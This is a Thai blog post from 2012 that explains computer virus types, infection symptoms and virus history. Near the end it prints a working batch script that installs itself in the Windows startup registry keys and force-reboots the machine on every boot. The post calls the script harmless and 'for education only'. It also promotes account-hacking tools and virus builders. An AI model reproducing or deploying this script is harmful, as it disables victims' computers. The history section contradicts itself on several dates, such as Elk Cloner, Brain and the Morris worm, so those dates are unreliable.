วันพุธที่ 29 สิงหาคม พ.ศ. 2555

ไวรัสคอมพิวเตอร์คืออะไร




 ไวรัสคืออะไร

 ไวรัส คือ โปรแกรมหรือชุดคำสั่งชนิดหนึ่งที่ถูกออกแบบมาเพื่อวัตถูประสงค์บางอย่างตามแต่ผู้ที่สร้างมันขึ้นมาไวรัสมีความสามารถในการสำเนาตัวเองเข้าไปติดอยู่ในระบบคอมพิวเตอร์ได้ และถ้ามีโอกาสก็สามารถแทรกเข้าไประบาดในระบบคอมพิวเตอร์อื่นๆ 

ซึ่งอาจเกิดจากการนำเอาดิสก์ที่ติดไวรัสจากเครื่องหนึ่งไปใช้อีกเครื่องหนึ่ง หรืออาจผ่านระบบเครือข่ายหรือระบบสื่อสารข้อมูล ไวรัสก็อาจแพร่ระบาดได้เช่นกัน
การที่คอมพิวเตอร์ใดติดไวรัส หมายถึงว่าไวรัสได้เข้าไปฝังตัวอยู่ในหน่วยความจำคอมพิวเตอร์เรียบร้อยแล้ว เนื่องจากไวรัสก็เป็นแค่โปรแกรมๆ หนึ่ง การที่ไวรัสจะเข้าไปอยู่ในหน่วยความจำได้นั้นจะต้องมีการถูกเรียกให้ทำงานได้นั้น ยังขึ้นอยู่กับประเภทของไวรัสแต่ละตัว ปกติผู้ใช้มักจะไม่รู้ัตัวว่าได้ทำการปลุกคอมพิวเตอร์ไวรัสขึ้นมาทำงานแล้ว
จุดประสงค์ของการทำงานของไวรัสแต่ละตัวขึ้นอยู่กับตัวผู้เขียนโปรแกรมไวรัสนั้น เช่น อาจสร้างไวรัสให้ไปทำลายโปรแกรมหรือข้อมูลอื่นๆ ที่อยู่ในเครื่องคอมพิวเตอร์ หรือแสดงข้อความวิ่งไปมาบนหน้าจอ เป็นต้น 


ไวรัสตัวแรกของโลก


  • ในปี พ.ศ. 2505 (ค.ศ. 1969) ทีมวิศวกรของ Bell Telephone Laboratories ได้สร้างเกมชื่อว่า "Darwin" ถือเป็นโปรแกรมคอมพิวเตอร์ตัวแรกที่มีรูปแบบของไวรัส โดยฝังตัวอยู่ในหน่วยความจำ เกมนี้ใช้คำศัพท์บางอย่างที่มีคำว่า "supervisor" มีลักษณะที่กำหนดกฎเกณฑ์การต่อสู้ระหว่างผู้เข้าแข่งขัน โปรแกรม Darwin นี้มีความสามารถที่จะวิจัยสภาพแวดล้อมของมัน ทำสำเนา และทำลายตัวเองได้ จุดประสงค์หลักของเกมนี้ก็คือลบโปรแกรมทั้งหมดที่คู่แข่งเขียนและครอบครองสนามรบ


  • ต้นปี พ.ศ. 2513 (ค.ศ. 1970) มีการตรวจพบไวรัส Creeper ในเครือข่าย APRAnet ของทหารอเมริกา ถือเป็นต้นแบบไวรัสคอมพิวเตอร์ในปัจจุบัน โปรแกรม Creeper สามารถเข้าครอบครองเครือข่ายผ่านโมเด็มและส่งสำเนาตัวเองไปที่ฝั่ง remote ไวรัสนี้ทำให้คนรู้ว่าติดไวรัสด้วยการ broadcast ข้อความ "I'M THE CREEPER ... CATCH ME IF YOU CAN"


ไวรัสในคอมพิวเตอร์มีอยู่กี่ประเภท

ไวรัสคอมพิวเตอร์ในโลกนี้มีนับล้านๆ ตัวแต่คุณรู้ใหมครับว่าดดยพื้นฐานของมันแล้วมาจากแหล ่งกำเหนิดที่เหมือนๆ กันซึ่งเราสามารถแบ่งประเภทของไวรัสคอมพิวเตอร์ออกมา ได้ดังนี้


1. บูตเซกเตอร์ไวรัส (Boot Sector Viruses) หรือ Boot Infector Viruses 

คือไวรัสที่เก็บตัวเองอยู่ในบูตเซกเตอร์ของดิสก์ การใช้งานของบูตเซกเตอร์ คือเมื่อเครื่องคอมพิวเตอร์เริ่มทำงาน
ขึ้นมาครั้งแรก เครื่องจะเข้าไปอ่านบูตเซกเตอร์ โดยในบูตเซกเตอร์จะมีโปรแกรมเล็ก ๆ ไว้ใช้ในการเรียก
ระบบปฏิบัติการขึ้นมาทำงาน 

การทำงานของบูตเซกเตอร์ไวรัสคือ จะเข้าไปแทนที่โปรแกรมที่อยู่ในบูตเซกเตอร์ โดยทั่วไปแล้วถ้าติดอยู่ในฮาร์ดดิสก์ จะเข้าไปอยู่บริเวณที่เรียกว่า Master Boot Sector หรือ Partition Table ของฮาร์ดดิสก์นั้น ถ้าบูตเซกเตอร์ของดิสก์ใดมีไวรัสประเภทนี้ติดอยู่ ทุก ๆ ครั้งที่บูตเครื่องขึ้นมา เมื่อมีการเรียนระบบปฏิบัติการ จากดิสก์นี้ โปรแกรมไวรัสจะทำงานก่อนและเข้าไปฝังตัวอยู่ในหน่วยค วามจำเพื่อเตรียมพร้อมที่จะทำงานตามที่ได้ถูกโปรแกรม มา ก่อนที่จะไปเรียนให้ระบบปฏิบัติการทำงานต่อไป ทำให้เหมือนไม่มีอะไรเกิดขึ้น 

วิธีการแพร่เชื้อไวรัสประเภทบูต เซ็กเตอร์ คือ พอเริ่มเปิดเครื่องดิสก์ที่ติดเชื้อไวรัสจะเข้าไปแทนที่หน่วยความจำในคอมพิวเตอร์ เมื่อใดก็ตาม ที่มีผู้นำแผ่นดิสก์สะอาดใส่เข้าไปในคอมพิวเตอร์ และพิมพ์คำว่า "catalog" เพื่อหารายชื่อของไฟล์ ดิสก์ใหม่นั้นก็จะติดไวรัสและเมื่อนำดิสก์ไปให้กับผู้อื่น ไวรัสก็จะติดคอมพิวเตอร์ตัวอื่นๆ เป็นไฟลามทุ่ง จนผู้ใช้คอมพิวเตอร์บางคนที่ไม่เคยพบเคยเจอไวรัส นึกว่า มนุษย์ต่างดาวเข้ามาทำลายระบบคอมพิวเตอร์ เพราะ "เอลก์ โคลนเนอร์" ทำให้ภาพที่จอกลับหัว ตัวอักษรกะพริบ และขึ้นข้อความประหลาดซึ่งเป็นกลอนที่ "สเครนต้า" แต่งขึ้นมาเองว่า "It will get on all your disks; it will infiltrate your chips." 

อย่างไรก็ตาม พิษของ "เอลก์ โคลนเนอร์" ไม่ร้ายแรงนักเทียบกับไวรัสนับแสนหรือเกินล้านตัวไปแล้วในปัจจุบัน เพราะทำให้รำคาญเท่านั้น


2. โปรแกรมไวรัส (Program Viruses) หรือ File Intector Viruses

 เป็นไวรัสอีกประเภทหนึ่งที่จะติดอยู่กับโปรแกรม ซึ่งปกติจะเป็นไฟล์ที่มีนามสกุลเป็น .COM หรือ .EXE และบางไวรัสสามารถเข้าไปอยู่ในโปรแกรมที่มีนามสกุลเป็น .SYS ได้ด้วยการทำงานของไวรัสประเภทนี้ คือ เมื่อมีการเรียกโปรแกรมที่ติดไวรัส ส่วนของไวรัสจะทำงานก่อนและจะถือโอกาสนี้ฝังตัวเข้าไ ปอยู่ในหน่วยความจำทันทีแล้วจึงค่อยให้โปรแกรมนั้นทำงานตามปกติ เมื่อฝังตัวอยู่ในหน่วยความจำแล้วหลังจากนี้หากมีการ เรียกโปรแกรมอื่น ๆ ขึ้นมาทำงานต่อ ตัวไวรัสจะสำเนาตัวเองเข้าไปในโปรแกรมเหล่านี้ทันที เป็นการแพร่ระบาดต่อไป 

นอกจากนี้ไวรัสนี้ยังมีวิธีการแพร่ระบาดอีกคือ เมื่อมีการเรียกโปรแกรมที่มีไวรัสติดอยู่ ตัวไวรัสจะเข้าไปหา โปรแกรมอื่น ๆ ที่อยู่ติดเพื่อทำสำเนาตัวเองลงไปทันที แล้วจึงค่อยให้โปรแกรมที่ถูกเรียกนั้นทำงานตามปกติต่อไป 

3. ม้าโทรจัน (Trojan Horse) 

เป็นโปรแกรมที่ถูกเขียนขึ้นมาให้ทำตัวเหมือนว่าเป็นโปรแกรมธรรมดา ทั่ว ๆ ไป เพื่อหลอกล่อผู้ใช้ให้ทำการเรียนขึ้นมาทำงาน แต่เมื่อถูกเรียกขึ้นมา ก็จะเริ่มทำลายตามที่โปรแกรมมาทันที ม้าโทรจันบางตัวถูกเขียนขึ้นมาใหม่ทั้งชุด โดยคนเขียนจะทำการตั้งชื่อโปรแกรมพร้อมชื่อรุ่นและคำ อธิบาย การใช้งาน ที่ดูสมจริง เพื่อหลอกให้คนที่จะเรียกใช้ตายใจ 

จุดประสงค์ของคนเขียนม้าโทรจันคือเข้าไปทำลาย ข้อมูลที่มีอยู่ในเครื่อง หรืออาจมีจุดประสงค์เพื่อที่จะล้วง เอาความลับของระบบคอมพิวเตอร์ ม้าโทรจันถือว่าไม่ใช่ไวรัส เมื่อเทียบเคียงรูปแบบการทำงาน เพราะเป็นโปรแกรมที่ถูกเขียนขึ้นมาโดด ๆ และจะไม่มีการเข้าไปติดในโปรแกรมอื่นเพื่อสำเนาตัวเอง แต่จะใช้ความรู้เท่าไม่ถึงการณ์ของผู้ใช้ เป็นตัวแพร่ระบาด

ซอฟต์แวร์ที่มี ม้าโทรจันอยู่ในนั้นและนับว่าเป็นหนึ่งในประเภทของโปรแกรมที่มีความอันตรายสูง เพราะยากที่จะตรวจสอบและ สร้างขึ้นมาได้ง่าย ซึ่งอาจใช้แค่แบต์ไฟล์ก็สามารถโปรแกรมม้าโทรจันได้ 

ม้าโทรจัน (Trojan Horses)  


นี่คือที่มาของชื่อ โทรจัน มาจากม้าไม้เมืองทรอยที่ซุ่มกำลังพลไว้ในม้าเพื่ออกมาโจมตีข้าศึก


Trojan Horse 
  •            ม้าโทรจัน (Trojan) ชื่อที่คุ้นหูจากมหากาพย์เมืองทรอยในอดีตของโฮมเมอร์ ถูกนำมาใช้เป็นชื่อของโปรแกรมคอมพิวเตอร์ที่ถูกออกแบบมาให้แฝงตัวเองเข้าไปในระบบและจะทำงานโดยการดักจับเอารหัสผ่านเข้าสู่ระบบต่างๆ และส่งกลับไปยังผู้ประสงค์ร้าย เพื่อเข้าใช้หรือโจมตีระบบในภายหลัง ซึ่งแฝงมาในหลายๆ รูปแบบ เช่นเกมส์ การ์ดอวยพร หรือจดหมายต่างๆ โปรแกรมโทรจัน ไม่ได้ถูกออกแบบมาเพื่อทำลายระบบ หรือสร้างความเสียหายต่อระบบ คอมพิวเตอร์ โทรจันต่างจาก ไวรัส และหนอนคือมันไม่สามารถทำสำเนาตัวเองและแพร่กระจายตัวเองได้ แต่มันสามารถที่จะอาศัยตัวกลาง ซึ่งอาจเป็นโปรแกรมต่างๆ จดหมาย หรือการไปโหลดไฟล์จากแหล่งต่างๆ เมื่อเรียกใช้งานไฟล์เหล่านี้ โทรจันก็จะทำงานและจะเปิดช่องทางต่างๆให้ผู้บุกรุกเข้าโจมตีระบบได้ ดังเช่นที่พวกกรีกทำกับชาวเมืองทรอยเมื่อครั้งอดีต 

4. โพลีมอร์ฟิกไวรัส (Polymorphic Viruses)

 เป็นชื่อที่ใช้เรียกไวรัสที่มีความสามารถในการแปรเปลี่ยนตัวเอง ได้เมื่อมีการสร้างสำเนาตัวเองเกิดขึ้น ซึ่งอาจได้ถึงหลายร้อยรูปแบบ ผลก็คือ ทำให้ไวรัสเหล่านี้ยากต่อการถูกตรวจจัดโดยโปรแกรมตรว จหาไวรัสที่ใช้วิธีการสแกนอย่างเดียว ไวรัสใหม่ ๆ ในปัจจุบันที่มีความสามารถนี้เริ่มมีจำนวนเพิ่มมากขึ้นเรื่อย ๆ 

5.สคริปต์ไวรัส (Scripts Viruses)   
          ไวรัสสายพันธุ์นี้เขียนขึ้นมาจากภาษาที่ใช้ในการเขียนโปรแกรม เช่น VBScript, JavaScript ซึ่งไวรัสคอมพิวเตอร์เหล่านี้จะทำงานเมื่อผู้ใช้เปิดหรือเรียกใช้งานไฟล์นามสกุล .vbs, .js ที่เป็นไวรัส ซึ่งอาจจะติดมาจากการเรียกดูไฟล์ HTML ในหน้าเว็บเพจบนเครือข่ายอินเทอร์เน็ต 


6. สทิลต์ไวรัส (Stealth Viruses) 

เป็นไวรัสที่มีความสามารถในการพรางตัวต่อการตรวจจับได้ เช่น ไฟล์อินเฟกเตอร์ ไวรัสประเภทที่ไปติดโปรแกรม ใดแล้วจะทำให้ขนาดของ โปรแกรมนั้นใหญ่ขึ้น ถ้าโปรแกรมไวรัสนั้นเป็นแบบสทิสต์ไวรัส จะไม่สามารถตรวจดูขนาดที่แท้จริงของโปรแกรมที่เพิ่มขึ้นได้

เนื่องจากตัวไวรัสจะเข้าไปควบคุมดอส ( dos) เมื่อมีการใช้คำสั่ง DIR หรือโปรแกรมใดก็ตามเพื่อตรวจดูขนาดของโปรแกรม ดอสก็จะแสดงขนาดเหมือนเดิม ทุกอย่างราวกับว่าไม่มีอะไรเกิดขึ้น

7. Macro viruses 

ไวรัสตัวนี้จะติดต่อกับไฟล์ซึ่งใช้เป็นต้นแบบ (template) ในการสร้างเอกสาร (documents หรือ spreadsheet) หลังจากที่ต้นแบบในการใช้สร้างเอกสาร ติดไวรัสแล้ว ทุก ๆ เอกสารที่เปิดขึ้นใช้ด้วยต้นแบบอันนั้นจะเกิดความเสียหาย


  • ชื่อไฟล์ไวรัส มักลงท้ายด้วยนามสกุล @m, @.mm.
  • เวิร์ม มักลงท้ายด้วยนามสกุล @Werm, @Wrm.
  •  โทรจัน มักบอกชื่อเป็นโทรจัน เช่น Trojan/Wukilbro.@... และอื่นๆ

สำหรับคอมที่ติดไวรัสมักมีอาการผิดปกติมากมายเช่น
  • ใช้เวลานานผิดปกติในการเรียกโปรแกรมขึ้นมาทำงาน
  •  ขนาดของโปรแกรมใหญ่ขึ้น
  •  วันเวลาของโปรแกรมเปลี่ยนไป
  •  ข้อความที่ปกติไม่ค่อยได้เห็นกลับถูกแสดงขึ้นมาบ่อย ๆ
  • เกิดอักษรหรือข้อความประหลาดบนหน้าจอหรือขึ้นป๊อปอัพมากวนเวลาทำงาน
  •  เครื่องส่งเสียงออกทางลำโพงโดยไม่ได้เกิดจากโปรแกรมที่ใช้อยู่
  •  แป้นพิมพ์ทำงานผิดปกติหรือไม่ทำงานเลย
  •  ขนาดของหน่วยความจำที่เหลือลดน้อยกว่าปกติ โดยหาเหตุผลไม่ได้
  •  ไฟล์แสดงสถานะการทำงานของดิสก์ติดค้างนานกว่าที่เคยเป็น
  •  ไฟล์ข้อมูลหรือโปรแกรมที่เคยใช้อยู่ ๆ ก็หายไป
  •  เครื่องทำงานช้าลง
  •  เครื่องรีบูตตัวเองโดยไม่ได้สั่่ง
  •  ระบบหยุดทำงานโดยไม่ทราบสาเหตุ
  •  เซกเตอร์ที่เสียมีจำนวนเพิ่มขึ้นโดยมีการรายงานว่าจำนวนเซกเตอร์ที่เสียมีจำนวนเพิ่มขึ้นกว่าแต่ก่อนโดยที่ ยังไม่ได้ใช้โปรแกรมใดเข้าไปตรวจหาเลย





  • เมื่อไวรัสเข้าแฟลชไดร์ฟจะจัดการอย่างไร 

เพื่อจัดการแก้ปัญหา ต้องจัดการ "ฆ่าไวรัส" ให้มันสิ้นไป ด้วยการสั่ง Format เริ่มต้น ไปที่ start manu กดที่ run-พิมพ์ cmd กด ok เมื่อหน้าจอ dos ขึ้น พิมพ์ลงไปดังนี้
(กรณีที่ไดร์ฟแฟลชไดร์ฟคือไดร์ว F) พิมพ์ว่า Format F:/fs:Fat32 หลังจากนั้น เครื่องก็จะจัดการฟอร์แมตแฟลชไดร์ฟให้เรา
แล้วเครื่องจะถามเกี่ยวกับ Label ว่าจะตั้งชื่อว่าอะไร ถ้าไม่ก็กดผ่านไปเป็นอันว่าเสร็จ นำ แฟลช ไดร์ฟ กลับมาใช้งานได้ตามปกติ




โปแกรมแฮ๊คข้อมูลและแอคเคาน์ของผู้ใช้เฟชบุ๊ค
 หน้าตาโปรแกรมสร้างไฟล์ไวรัสรูปแบบต่างๆ



ตัวอย่างไฟล์ไวรัสที่ถูกสร้างเสร็จและแปลงรหัสพร้อมทำงานแล้วเมื่อนำไปใส่ในบางโปรแกรมเพื่อให้มันมีชีวิตขึ้นมา ( ตอนนี้ยังใช้ไม่ได้ ) นำมาให้ดูเพื่อการศึกษาเท่านั้น ชุดคำสั่งนี้เป็นไวรัสที่สร้างมาเพื่อให้มันรีสตาร์ทเครื่องใครโดนเข้าเครื่องจะรีสตาร์ททั้งวัน

@echo off
break off
TITLE Unlocker Hackers
echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo Unlocker Hackers Strike Again
PAUSE



โปแกรมแฮ๊คเกอร์ที่บรรดาเหล่าแฮ๊คเกอร์ทั่วโลกรู้จักดี


หน้าตาโปรแกรมสร้าง WORM มหันตภัยอีกตัวในโลกไซเบอร์


ชื่อโปรแกรมสร้างไวรัสอีกตัวที่ได้รับความนิยมในหมู่นักสร้างไวรัสเพราะทำได้ง่ายและหลากหลายรูปแบบ

 ปี 1986 มีไวรัสที่จ้องเล่นงานระบบของไมโครซอฟต์ขึ้นมา "เบรน (Brain) เป็นไวรัสที่สร้างขึ้นโดยสองพี่น้องชาวปากีสถาน คือ อัมจัด และ บาสิต ฟารูก เพื่อต้องการลงโทษผู้ที่ใช้ซอฟต์แวร์เถื่อน "เบรน" ไม่ได้สร้างความเสียหายมาก เพียงแต่ขึ้นเบอร์โทรศัพท์ร้านซ่อมคอมพิวเตอร์ของพวกเขาเท่านั้น 

ปัจจุบัน ไวรัสแพร่โดยผ่านอีเมล์ เมื่อเปิดอีเมล์ออกอ่าน ไวรัสจะเข้าไปทำลายโปรแกรมรวมทั้งข้อมูลในคอมพิวเตอร์ และส่งอีเมล์บรรจุไวรัสไปยังอีเมลแอดเดรสของผู้อื่นโดยอัตโนมัติ อย่าง ไวรัส  เมลิสซา (Melissa) เมื่อปี 1999 ไวรัส "เลิฟบั๊ก (Love Bug) เมื่อปี 2000 และ ไวรัส "โซบิ๊ก (SoBig) เมื่อปี 2003 นอกจากนี้ไวรัสยังแพร่ผ่านระบบเครือข่าย ซึ่งทำให้การแพร่กระจายรวดเร็วกว่าการเปิดอีเมล์เสียอีก และยังสามารถขโมยข้อมูลส่วนบุคคล เช่น พาสเวิร์ด เพื่อทำอีเมล์ขยะส่งไปและยากที่จะหาต้นตอ ผู้ที่ชอบเข้าไปเว็บไซต์ลามกยังติดไวรัสได้อย่างง่ายๆ ด้วย 

เดฟ มาร์คัส ผู้จัดการด้านวิจัยของบริษัท McAfee Inc. ผู้ผลิตซอฟต์แวร์กำจัด "มัลแวร์" หรือซอฟต์แวร์ที่พัฒนาขึ้นโดยมีเจตนามุ่งร้ายต่อระบบคอมพิวเตอร์โดยเฉพาะ เช่น โทรจัน ฟิชชิ่ง สปายแวร์ กล่าวว่า เดี๋ยวนี้มีผู้สร้างมัลแวร์เพิ่มขึ้น วันหนึ่งมีมัลแวร์ใหม่ๆ ราว 150-175 ตัว ขณะที่ 5 ปีที่แล้ว พบมัลแวร์อาทิตย์ละประมาณ 100 ตัว อย่างไรก็ตาม การกำจัดมัลแวร์ไปจนถึงหนอนคอมพิวเตอร์ ไวรัส ได้สร้างรายได้ให้กับบริษัทผลิตซอฟต์แวร์ต่อต้านถึงปีละ 38,000 ล้านเหรียญ หรือ 1.3 ล้านล้านบาท



ไวรัสคอมพิวเตอร์ตัวสำคัญของโลก

ปี 1982 "เอลก์ โคลนเนอร์ (Elk Cloner) เป็นไวรัสตัวแรกของโลกที่เข้าไปยังเครื่องคอมพิวเตอร์ส่วนบุคคลของผู้ใช้ทั่วโลก โดยผ่านฟล็อปดิสก์ของเครื่องคอมพิวเตอร์ "แอปเปิ้ล II" และจะขึ้นคำกลอนของ "ริช สเครนต้า" 

ปี 1986 "เบรน (Brain)  เป็นไวรัสตัวแรกที่เข้าไปในระบบ "ดอส" ของไมโครซอฟต์ เป็นฝีมือของสองพี่น้องชาวปากีสถาน ไวรัสจะทำให้เครื่องคอมพิวเตอร์ที่ติดเชื้อขึ้นเบอร์โทรศัพท์ร้านซ่อมคอมพิวเตอร์ของพวกเขา 

ปี 1988 "มอร์ริส (Morris)  เป็นหนอนคอมพิวเตอร์ หรือโปรแกรมที่ถูกออกแบบมาให้มีความสามารถในการทำสำเนาตัวเองด้วยโค้ดที่อยู่ในตัวมันเองโดยอิสระ ไม่ต้องรอการเรียกใช้งานจากผู้ใช้ หนอนคอมพิวเตอร์จะทำการแพร่กระจายตัวเองจากคอมพิวเตอร์เครื่องหนึ่งไปยังอีกเครื่องหนึ่ง โดยอาศัยระบบเครือข่ายที่สามารถแพร่กระจายได้อย่างรวดเร็วและทำความเสียหายได้ 

สำหรับ "มอร์ริส" เขียนโดยบุตรชายของเจ้าหน้าที่ระดับสูงในรัฐบาลและเป็นผู้เชี่ยวชาญด้านความปลอดภัยคอมพิวเตอร์ และเป็นผู้ที่เรียนจบจากมหาวิทยาลัยคอร์แนล ทำให้คอมพิวเตอร์ของมหาวิทยาลัยและทหารเสียหายกว่า 6,000 เครื่อง โดยการแพร่ผ่านอินเตอร์เน็ต

ปี 1999 "เมลิสซา (Melissa)" เป็นไวรัสตัวแรกๆ ที่แพร่ผ่านอีเมล์ เมื่อผู้เปิดอีเมล์ติดเชื้อไวรัส ไวรัสจะก๊อบปี้ตัวเองส่งไปยังตามอีเมล์แอดเดรส 50 ที่อยู่แรก ทำให้ไวรัสแพร่ไปทั่วโลกอย่างรวดเร็ว 

ปี 2000 "เลิฟบั๊ก (Love Bug)" แพร่โดยอีเมล์เช่นกัน โดยจะหลอกผู้รับว่าเป็นจดหมายรัก ทำให้ผู้รับรีบเปิดอีเมล์ดูโดยไม่ทันเฉลียวใจว่าถูกหลอก

ปี 2001 "โค้ดเรด (Code Red)" เป็น "หนอนเครือข่าย" ตัวแรกๆ ที่เข้าไปทำลายจุดอ่อนของซอฟต์แวร์ไมโครซอฟต์ และแพร่ไปยังคอมพิวเตอร์อื่นๆ อย่างรวดเร็ว เพราะแพร่ผ่านโดย "ระบบเครือข่าย" ไม่ต้องรอให้ผู้ใช้เข้ามาเปิดอีเมล์

ปี 2003 "แบลสเตอร์ (Blaster)" ฉวยโอกาสที่รู้จุดอ่อนของซอฟต์แวร์ไมโครซอฟต์ และเกิดขึ้นพร้อมๆ กับไวรัส "โซบิ๊ก" ทำให้ทางไมโครซอฟต์ถึงกับเสนอรางวัลให้กับผู้ที่ชี้เบาะแสกับทางการหาตัวและนำผู้ที่เขียนไวรัสมาลงโทษ

ปี 2004 "แซสเซอร์ (Sasser)" เด็กวัยรุ่นชาวเยอรมันเป็นผู้เขียนหนอนนี้ แพร่โดยอาศัยช่องโหว่จากระบบปฏิบัติการวินโดว์สของไมโครซอฟต์ ความเสียหายจากแซสเซอร์ มีตั้งแต่ทำลายระบบคอมพิวเตอร์ของโรงพยาบาลในฮ่องกง ที่ทำการไปรษณีย์หลายแห่งในไต้หวัน สายการบินบริติชแอร์เวย์เลื่อนเที่ยวบินประมาณ 20 เที่ยวบิน

20 ไวรัสที่ถูกบันทึกไว้ในประวัติศาสตร์

1.CREEPER (1971)
โปรแกรมหนอนอินเตอร์เน็ตตัวแรกเกิดขึ้นเมื่อวันที่ 10 ธันวาคม ในคอมพิวเตอร์ที่ใช้ระบบปฏิบัติการ TOPS TEN

2.ELK CLONER (1985) 
เป็นไวรัสคอมพิวเตอร์ส่วนบุคคลตัวแรก ที่เกิดกับ Apple IIe เป็นผลงานของเด็กนักเรียนระดับมัธยมศึกษา (เกรด 9)

3.THE INTERNET WORM (1985) 
เขียนโดยบุคลากรในมหาวิทยาลัยคอร์เนลล์ซึ่งมีผลต่อการใช้งานอินเตอร์เน็ต 

4.PAKISTANI BRAIN (1988)
ไวรัสตัวแรกที่ติดกับคอมพิวเตอร์พีซีไอบีเอ็ม เขียนโดยสองพี่น้องจากปากีสถาน ถือเป็นไวรัสตัวแรกที่สื่อให้ความสนใจอย่างแพร่หลาย

5.JERUSALEM FAMILY (1990) 
มีสายพันธุ์ที่แตกต่างกันประมาณ 50 สายพันธุ์ เชื่อกันว่ามีต้นกำเนิดมาจากมหาวิทยาลัยเยรูซาเล็ม

6.STONED (1989)
ไวรัสที่แพร่ระบาดหนักที่สุดช่วงสิบปีแรก ติดเชื้อในส่วนบูตระบบ /.mbr ส่งผลให้รีบูตระบบหลายครั้งและยังแสดงข้อความว่า “your computer is now stoned”

7.DARK AVENGER MUTATION ENGINE (1990)

เขียนเมื่อปี 1988 แต่นำไปใช้ครั้งแรกต้นปี 1990 เช่นเดียวกับไวรัส POGUE และ COFFEESHOP กลไกการกลายพันธุ์ได้หลากหลายรูปแบบของไวรัสตัวนี้ ทำให้ไวรัสสามารถทำงานได้ตลอดเวลา

8.MICHEANGELO (1992)
สายพันธุ์หนึ่งของ STONED ความสามารถทำลายล้างสูง โดยวันที่ 6 มีนาคม ไวรัสตัวนี้จะลบ 100 เซ็คเตอร์แรกของฮาร์ดไดรฟ์ให้ใช้งานไม่ได้ 

9.WORLD CONCEPT (1995) 
ไวรัส Microsoft Word Macro ตัวแรกที่แพร่กระจายสู่โลกภายนอก โดยมีการแอบใส่ข้อความไว้ว่า “That”s enough to prove my point” ถือเป็นการเปิดศักราชใหม่ในยุคที่สองของไวรัสคอมพิวเตอร์ และที่สำคัญเป็นไวรัสคอมพิวเตอร์ที่เกิดจากแฮกเกอร์ซึ่งมีทักษะน้อยมาก

10.CIH/CHERNOBYL (1998) 
ไวรัส Chernobyl เป็นไวรัสทำลายล้างมากที่สุดเท่าที่เคยพบ เริ่มปฏิบัติการทำลายล้างโดยอาศัยเงื่อนไข คือ เมื่อปฏิทินในเครื่องคอมพิวเตอร์ตรงกับวันที่ 26 ในทุกๆ เดือน สามารถทำลายข้อมูลในฮาร์ดดิสก์ และทำลายข้อมูลการบูตที่เก็บอยู่ในไบออส โดยแฟลชไบออสด้วยข้อมูลขยะส่งผลให้ข้อมูลต่างๆ ที่เคยแสดงตอนบูตเครื่องกลายเป็นหน้าว่างๆ และไม่สามารถเรียกขึ้นมาใช้งานได้อีกต่อไป

11.MELISSA (1999) 
ไวรัส สำคัญตัวแรกที่แพร่ระบาดผ่านอี-เมล และเป็นการเริ่มต้นของยุคไวรัสอินเตอร์เน็ตอย่างแท้จริง แม้ Melissa ไม่ได้มีวัตถุประสงค์เพื่อการทำลาย แต่ก่อให้เกิดความรำคาญแก่ผู้ใช้เนื่องจากจะทำให้กล่องรับอี-เมลเต็มในทุก ที่ที่เกิดการติดเชื้อ

12.LOVEBUG (2001)
หนอนอี-เมลที่ได้รับความนิยมสูงสุด เป็นรูปแบบของการใช้ชุมชนเครือข่ายสังคมออนไลน์ให้เป็นประโยชน์

13.Code RED (2001) 
ตั้ง ชื่อตามเครื่องดื่มที่มีคาเฟอีนสูงที่ได้รับความนิยม ไวรัสเครือข่ายตัวนี้จะอาศัยอยู่ในคอมพิวเตอร์ที่มีช่องโหว่ความปลอดภัย และทำการแพร่ระบาดด้วยตัวเอง

14.NIMDA (2001)
เรียกกันว่า “Swiss Army Knife” หรือมีดอเนกประสงค์ของไวรัส ซึ่งจะใช้หลายวิธีในการเข้าสู่เครือข่าย ไม่ว่าจะเป็นหน่วยความจำล้นอี-เมล การใช้เครือข่ายร่วมกัน และวิธีการอื่นๆ อีกเป็นสิบวิธี

15.BAGEL/NETSKY (2004)
เป็นไวรัสที่ออกแบบมาโดยมีความสามารถเทียบเคียงกัน และต่อสู้กันเอง แต่ละตัวสร้างสายพันธุ์ออกมาอีกนับร้อยสายพันธุ์ และใช้เทคโนโลยีใหม่ๆ ซึ่งประสบความสำเร็จในการแพร่ระบาดอย่างมาก หนอนทั้งสองตัวนี้ติดอยู่ในกระแสข่าวตลอดทั้งปี

16.BOTNETS (2004) 

นัก รบซอมบี้ในโลกอินเตอร์เน็ตเหล่านี้ช่วยงานอาชญากรไซเบอร์ด้วยการสะสมกำลังพล คอมพิวเตอร์ที่ติดเชื้ออย่างไม่มีวันสิ้นสุด โดยอาชญากรไซเบอร์จะสามารถกำหนดค่าใหม่ให้กับคอมพิวเตอร์ในเครือข่ายได้ เพื่อให้ส่งต่อสแปม เพิ่มเหยื่อติดเชื้อ และขโมยข้อมูล

17.ZOTOB (2005)

หนอนตัวนี้มีผลเฉพาะกับระบบ Windows 2000 ที่ไม่ได้ติดตั้งโปรแกรมซ่อมแซม แต่ความสามารถที่โดดเด่น เข้าควบคุมไซต์ของสื่อรายใหญ่หลายแห่ง รวมทั้งซีเอ็นเอ็น และนิวยอร์ก ไทม์ส ด้วย

18.ROOTKITS (2005) 

หนึ่งในเครื่องมือที่ได้รับความนิยมสูงสุดในโลกของโค้ดที่เป็นอันตราย ซึ่งถูกใช้เพื่อทำให้มัลแวร์อื่นสามารถซ่อนตัวอยู่ในคอมพิวเตอร์ได้ โดยมัลแวร์ที่ซ่อนตัวอยู่จะทำงานที่เป็นอันตรายอย่างลับๆ

19.STORM WORM (2007)

ไวรัส ลวงที่ที่เกิดขึ้นซ้ำนับพันๆ ครั้ง และในท้ายที่สุดก็จะสร้างบ็อตเน็ตที่มีขนาดใหญ่ที่สุดในโลก โดยเชื่อว่ามีคอมพิวเตอร์ที่ติดเชื้อในเวลาเดียวกันมากกว่า 15 ล้านเครื่อง และอยู่ภายใต้การควบคุมของอาชญกรใต้ดิน


20.ITALIAN JOB (2007)

ไม่ใช่มัลแวร์ที่ใช้เครื่องมือเดี่ยวๆ แต่เป็นการโจมตีร่วมกันโดยใช้ชุดเครื่องมือที่จัดเตรียมไว้ล่วงหน้าหรือ รู้จักว่า MPACK เพื่อสร้างมัลแวร์รุ่นใหม่เพื่อการขโมยข้อมูลขึ้นมา และมีเว็บไซต์กว่าหมื่นแห่งตกเป็นเหยื่อ

